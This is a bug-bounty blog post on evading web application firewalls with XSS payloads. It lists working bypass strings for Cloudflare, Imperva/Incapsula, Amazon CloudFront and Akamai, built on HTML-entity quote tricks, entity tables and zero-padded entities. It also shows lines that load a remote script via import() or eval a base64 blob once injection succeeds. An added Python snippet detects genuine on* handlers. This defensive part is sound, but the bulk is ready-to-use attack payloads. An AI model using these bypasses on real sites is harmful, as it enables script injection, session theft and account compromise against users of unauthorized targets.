When I started bug bounty, a major obstacle was the blocking of my XSS injections by WAFs.

So my quest was to find a “universally” effective payload, one that works in most cases.

At first I came across programs behind Cloudflare. Although Cloudflare is reputable, it can be bypassed with a variety of payloads available on GitHub or Twitter. Here are a few examples I’ve used in my tests.

A commonly used method is to prefix the JavaScript event with on:

<img/ignored=()%0Asrc=x%0Aonerror=prompt(1)>
<svg onload=prompt%26%230000000040document.domain)>
<Img Src=On OnError=alert(1)>

My goal was to discover a JS event bypass payload for XSS injections inside double quotes, in cases where you can’t reopen a tag, as well as for classic tag injections.

" onerror[JS]
<img src=x onerror=[JS]>

During my search for the magic payload, I identified several possible injection points. However, most of the characters were blocked by WAFs because they were blacklisted. Looking at the left side of the event name, I discovered that by adding a character before the JavaScript event name, the payload was accepted.

Description                           Status
The WAF blocks                        403
The payload passes                    200
The payload is syntactically valid    Valid
The payload is syntactically invalid  Invalid

onerror=[JS]   Return 403 Valid
/onerror=[JS]  Return 403 Valid
aonerror=[JS]  Return 200 Invalid

So I started thinking about quotes that can be concatenated with the event name:

<x ""onerror=[JS]>      Return 200 Invalid
<x x="""onerror=[JS]>   Return 200 Invalid
<x x=""onerror=[JS]>    Return 403 Valid

When an odd number of quotes is used, the payload passes the WAF, but it is not valid because the extra quotes get concatenated onto the event name. I thought I’d try using HTML entities, which are aliases for certain special characters. By replacing the middle quote with an entity alias, the payload is valid and bypasses WAFs!!!!!

🔥"&quot;"🔥

<x x="&quot;"onerror=[JS]>
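As an added example (not part of the original post), the following Python tokenizes each variant from the table above with the standard html.parser to show which ones actually yield an on* attribute once quotes and entities are handled the way a browser does. A filter that inspects attribute names after tokenizing and entity-decoding sees the handler regardless of how the quotes are arranged, which is the check a quote-counting regex misses.

```python
import re
from html.parser import HTMLParser

# Added example, not code from the original post. It shows what a
# browser-like tokenizer produces for the post's quote/entity variants and
# flags only the attributes whose name really is an on* event handler.

_EVENT_ATTR = re.compile(r"^on[a-z]+$")


class _AttrCollector(HTMLParser):
    """Collect (name, entity-decoded value) pairs for every start tag."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases names and decodes entities in values,
        # so "&quot;" inside a quoted value becomes a literal quote here.
        self.attrs.extend(attrs)


def tokenize_attrs(fragment: str):
    """Return the attribute list a browser-like tokenizer sees in `fragment`."""
    parser = _AttrCollector()
    parser.feed(fragment)
    parser.close()
    return parser.attrs


def event_handlers(fragment: str):
    """Names of genuine on* handler attributes in `fragment` ([] means none)."""
    return [name for name, _ in tokenize_attrs(fragment) if _EVENT_ATTR.match(name)]


if __name__ == "__main__":
    # Constructed inputs, taken from the post's own table of variants.
    for frag in (
        '<x ""onerror=[JS]>',
        '<x x="""onerror=[JS]>',
        '<x x=""onerror=[JS]>',
        '<x x="&quot;"onerror=[JS]>',
        '<details/open/id="&quot;"ontoggle=[JS]>',
    ):
        print(f"{frag!r:44} attrs={tokenize_attrs(frag)} handlers={event_handlers(frag)}")
```

The odd-quote variants come back with names like `""onerror`, which is exactly why the post calls them syntactically invalid, while the entity variant produces a clean `onerror` attribute with the decoded quote sitting harmlessly in the previous attribute's value.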

HTML entities are very useful when the & character is not filtered. To my knowledge there are 3 types available: named, hexadecimal and decimal.

Named entities:

' -> &apos;
" -> &quot;
` -> &grave;
` -> &DiacriticalGrave;
( -> &lpar;
) -> &rpar;
{ -> &lcub;
} -> &rcub;
& -> &amp;
< -> &lt;
> -> &gt;
\n -> &NewLine;
\t -> &Tab;
nbsp -> &nbsp;
\ -> &bsol;

Hex entities:

' -> &#x27;
" -> &#x22;
` -> &#x60;
( -> &#x28;
) -> &#x29;
{ -> &#x7b;
} -> &#x7d;
& -> &#x26;
< -> &#x3c;
> -> &#x3e;
\n -> &#x0a;
\t -> &#x09;
nbsp -> &#xa0;
\ -> &#x5c;

Decimal entities:

' -> &#39;
" -> &#34;
` -> &#96;
( -> &#40;
) -> &#41;
{ -> &#123;
} -> &#125;
& -> &#38;
< -> &#60;
> -> &#62;
\n -> &#10;
\t -> &#9;
nbsp -> &#160;
\ -> &#92;

With numeric and hex entities, what’s really handy is that you can add as many leading zeros as you like, and this is often very poorly filtered.

" -> &#34; -> &#00000000000000000000000034; Numeric entity 
" -> &#x22; -> &#x000000000000000000000022; Hex entity

Personally, I quite often use it to load my script once an XSS has been detected, either loading a remote script with import() or performing a big base64 eval:

import&lpar;&#x27;https://example.com&#x27;&rpar;
eval&lpar;atob&lpar;&#x27;BASE64===&#x27;&rpar;&rpar;

Back to the WAF bypass: on which WAFs does this payload work? I tried it on the better-known ones I had in my scopes:

Imperva & Incapsula

Works perfectly for Imperva and Incapsula:

<details/open/id="&quot;"ontoggle=[JS]>

Amazon

It also works well for Amazon WAFs and CloudFront:

<details/open/id="&quot;"ontoggle=[JS]>

Akamai

For Akamai, I had to add other quotes for it to work:

<details open id="' &quot;'"ontoggle=[JS]>

You can find these payloads in my XSS bypass notes on GitHub:
https://github.com/Edr4/XSS-Bypass-Filters